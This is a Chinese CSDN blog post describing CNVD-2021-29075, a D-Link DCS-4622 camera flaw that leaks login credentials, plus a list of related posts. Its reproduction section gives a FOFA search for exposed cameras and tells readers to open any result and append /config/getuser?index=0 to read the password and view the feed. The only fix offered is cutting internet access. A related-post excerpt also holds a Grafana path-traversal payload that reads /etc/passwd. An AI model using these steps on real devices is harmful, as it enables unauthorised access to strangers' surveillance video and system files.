CNVD-2021-29075:D-Link DCS-4622 监控账号密码泄露漏洞

最新推荐文章于 2024-07-25 09:09:40 发布
最新推荐文章于 2024-07-25 09:09:40 发布
阅读量1k 收藏 8
点赞数 2
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Foreverlove112/article/details/126755515
版权

一:简介

D_Link-DCS-4622监控通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面。

漏洞描述

D_Link-DCS-4622监控通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面。危害级别:中危|攻击复杂度:低

二:漏洞复现

步骤一:使用fofa搜索一下语句,并随便打开一个页面!!!

下面展示一些 内联代码片

 app="D_Link-DCS-4622"

在这里插入图片描述在这里插入图片描述

步骤二:拼接一下路径并进行访问,得到账号密码回到登录界面进入查看…

/config/getuser?index=0

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三:修补方法

禁止互联网访问

/config/getuser?index=0
Doxi-13A
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现 D-Link DCS 密码泄露漏洞
失心少年
06-21 410
D-link DCS是一款网络摄像机,工作温度为0-50℃。D-link DCS系统存在密码泄露漏洞,攻击者通过漏洞可以获取后台权限。1.使用poc进行账号密码查看,得到密码登录即可。
D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)
good good study
03-09 4564
漏洞详情 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。 漏洞影响 AU_2.31_V1.1.47ae55之前版本 EG_1.00b4 漏.
D-Link DCS系列监控 账号密码信息泄露漏洞
weixin_51387754的博客
11-05 1084
漏洞简介 D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机, 根据VULDB 所看到的信息原文如下 A vulnerability, which was classified as problematic, was found in D-Link DCS-2530L and DCS-2670L (the affected version unknown). This affects some unknown processing of the file /config/get
D-Link DCS系列监控账号密码信息泄露
The current road is different, love needs to distinguish between right and wrong
11-18 1705
简介: 漏洞编号:CVE-2020-25078 D-Link DCS是网络监控摄像机设备,通过访问特定的URL可以得到账号密码信息,攻击方可以 直接进入利用漏洞得到账户密码直接进入后台获取视频监控页面。 影响版本: DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703 漏洞复现: fofa直接搜索: app="D_Link-DCS-2530L" 可以看到还
某些型号的Comba和D-Link路由器存在管理员密码泄露漏洞
NOSEC2019的博客
09-12 1204
近期,Trustwave旗下SpiderLabs的安全研究人员在某些型号的D-Link和Comba WiFi路由器中发现管理员明文密码泄露漏洞。 来自SpiderLabs的研究人员Simon Kenin发现了5个登录凭证泄露漏洞,其中3个漏洞影响到一些Comba Telecom WiFi路由器,另外两个影响到D-Link DSL调制解调器。 攻击者可以直接使用这些登录凭证接管路由器,后续再通过更...
允许攻击者访问视频流:D-Link摄像头漏洞分析
systemino的博客
05-05 1390
概述 对于许多人来说,都希望通过安装“智能”摄像头,来提高家庭或办公室的安全性。一旦这些设备直接连接到互联网,只需点击几下,用户就可以轻松查看他们的监控视频流。然而,如果摄像头受到安全漏洞的影响,那么这种“便利性”将很快变成薄弱点,会给未经授权的攻击者打开大门。正如ESET智能家居研究团队的研究结果所显示的,D-Link DCS-2132L云端摄像头就正在面临这样的情况。该摄像头存在一系列安全漏...
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
CNVD-2021-10543:CNVD-2021-10543:MessageSolution企业邮件扩展管理系统EEA存在信息扩展漏洞
03-25
CNVD-2021-10543 CNVD-2021-10543:MessageSolution企业邮件扩展管理系统EEA存在信息扩展漏洞#使用python3 CNVD-2021-10543.py
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
CVE-2020-25078:D-Link DCS系列账号密码信息扩展,通过脚本获取账号密码,可批量
03-30
CVE-2020-25078:D-Link DCS系列账号密码信息扩展,通过脚本获取账号密码,可批量
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
2021年部分漏洞整合+检测工具
weixin_48421613的博客
12-15 3409
2021年已进入到尾声,出现的漏洞五花八门,令人眼花缭乱,其中确实有很多值得思考和学习,所以今天总结出9个比较有代表性、危害范围比较广泛的漏洞进行介绍,以及使用脚本进行检测 grafana任意文件读取漏洞 漏洞原理啥的就不再赘述,直接上测试过程以及脚本的检测方式,目前脚本检测仅支持单独检测 poc: /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd 页面原型: 漏洞
D-Link DCS系列监控账号密码信息泄露漏洞(含批量验证poc)
weixin_43567873的博客
04-06 135
D-Link DCS系列监控账号密码信息泄露漏洞(含批量验证poc)
【问题解决】Nacos服务端NVDB-CNVDB-2023674205漏洞
拾级而上
03-13 2958
Nacos认证绕过漏洞 NVDB-CNVDB-2023674205 解决方案。
查看漏洞库的地址总结
guanjian_ci的博客
03-12 2097
1、CNNVD(国家信息安全漏洞库):http://www.cnnvd.org.cn/ 2、CNVD(国家信息安全漏洞共享平台):https://www.cnvd.org.cn/ 3、乌云:http://wooyun.2xss.cc/ 4、VULHUB(信息安全漏洞门户):http://vulhub.org.cn/view/global 5、安全客(全球最新漏洞库):https://www.anquanke.com/vul/ 6、绿盟漏洞库:http://www.nsfocus.net/index.php?
浅谈漏洞来源(CVE,NVD,CNVD,CNNVD)
热门推荐
TT成长博客
02-23 2万+
网络安全人士可能会问这样一个问题,安全漏洞是哪里来的,什么渠道,可靠吗。那么多的安全产品,他们的漏洞库都是自己整理的吗?(怎么可能撒),虽然各安全厂商都搞自己的威胁情报中心,但是威胁情报除了自研的,很多还是靠类似公益的机构来支持,比如业界大家都知道的几个平台,我们就简单和大家掰扯掰扯吧。
-czt shell tar_web扫描
weixin_39622905的博客
12-21 963
服务器1号 可疑文件访问 111.6.78.229 /.zip 2020-07-14 22:48:37 404 8服务器1号 可疑文件访问 111.6.78.229 /.tar.gz 2020-07-14 22:48:37 404 8服务器1号 可疑文件访问 111.6.78.229 /.zip 2020-07-14 10:09:47 404 6服务器1号 可疑文件访问 111.6.78.229 ...
极速下载!青苹果系统Win7旗舰版:稳定安全!
最新发布
lihuiyun184291的博客
07-25 427
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
"盘企LCMS代码审计『CNVD-2021-28469』:发现漏洞及解决方法
盘企LCMS是一款小众的CMS(内容管理系统),在进行代码审计时发现了一个反射型XSS漏洞漏洞编号:CNVD-2021-28469)。尽管这是一个不大知名的CMS,但仍然会出现常见的漏洞,而且XSS漏洞是比较常见的。该漏洞的触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值